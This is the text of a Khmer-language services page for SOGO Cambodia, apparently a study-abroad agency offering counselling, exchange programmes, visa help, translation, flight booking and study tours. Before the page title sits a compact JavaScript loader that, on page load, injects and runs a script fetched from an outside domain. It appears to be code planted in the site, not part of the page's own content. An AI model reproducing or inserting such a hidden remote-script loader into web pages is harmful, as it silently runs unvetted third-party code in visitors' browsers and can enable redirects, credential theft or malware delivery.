;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); សេវាកម្មរបស់យេីង - SOGO Cambodia Skip to main content

សេវាកម្មរបស់យេីង

SOGO ផ្តល់នូវសេវាកម្មអប់រំជាកញ្ចប់ក្នុងការទៅសិក្សានៅក្រៅប្រទេសដែលមានលក្ខណៈទូលំទូលាយ សមស្របទៅតាមតម្រូវការរបស់អ្នក។ យើងជួយសិស្សានុសិស្សក្នុងការជ្រើសរើសមុខវិជ្ជាសិក្សា និងស្ថាប័នសិក្សាដែលល្អសម្រាប់សិស្សានុសិស្ស ក៏ដូចជារៀបចំ និងផ្ដល់ជំនួយដល់សិស្សលើគ្រប់ដំណើរការសិក្សាទាំងមូល។

កម្មវិធីថ្នាក់ឧត្តមសិក្សានៅក្រៅប្រទេស

ផ្តល់ការប្រឹក្សាដោយឥតគិតថ្លៃលើការជ្រើសរើសវគ្គសិក្សា កម្មវិធីសិក្សា ស្ថាប័នសិក្សា និងសាកលវិទ្យាល័យដែលល្អបំផុតសមស្របទៅតាមតម្រូវការរបស់អ្នក។

កម្មវិធីសិក្សាថ្នាក់វិទ្យាល័យនៅក្រៅប្រទេស

កម្មវិធីផ្លាស់ប្តូរការសិក្សា និងកម្មវិធីសិក្សាថ្នាក់វិទ្យាល័យនៅ សហរដ្ឋអាមេរិក ចក្រភពអង់គ្លេស កាណាដា អូស្ត្រាលី និងបណ្ដាប្រទេសជាច្រើនទៀត។

សេវាកម្មស្នើសុំទិដ្ឋាការ

ជួយអ្នកក្នុងការស្នើសុំទិដ្ឋាការ និងការផ្លាស់ប្តូរក្នុងការទៅសិក្សានៅប្រទេសដែលអ្នកជ្រើសរើស។

សេវាកម្មបកប្រែ

បកប្រែឯកសារផ្លូវការ ព្រឹត្តិបត្រពិន្ទុសិក្សា និងឯកសារពាក់ព័ន្ធផ្សេងទៀតសម្រាប់ការចូលរៀន និងដំណើរការស្នើសុំទិដ្ឋាការ។

ការកក់សំបុត្រយន្តហោះ

ជួយអ្នកក្នុងការកក់សំបុត្រយន្តហោះស្របតាមកាលបរិច្ឆេទចេញដំណើរ ពិនិត្យមើលជើងហោះហើរ និងផ្ដល់ជូននូវតម្លៃសមរម្យ។

កម្មវិធីទស្សនកិច្ចសិក្សា និងកម្មវិធីវគ្គសិក្សាខ្លី

ទទួលបានបទពិសោធក្នុងការទៅសិក្សានៅក្រៅប្រទេស តាមរយៈការធ្វើដំណើរទេសចរណ៍ដែលរួមបញ្ចូលនូវបទពិសោធអប់រំ និងដំណើរកំសាន្ត។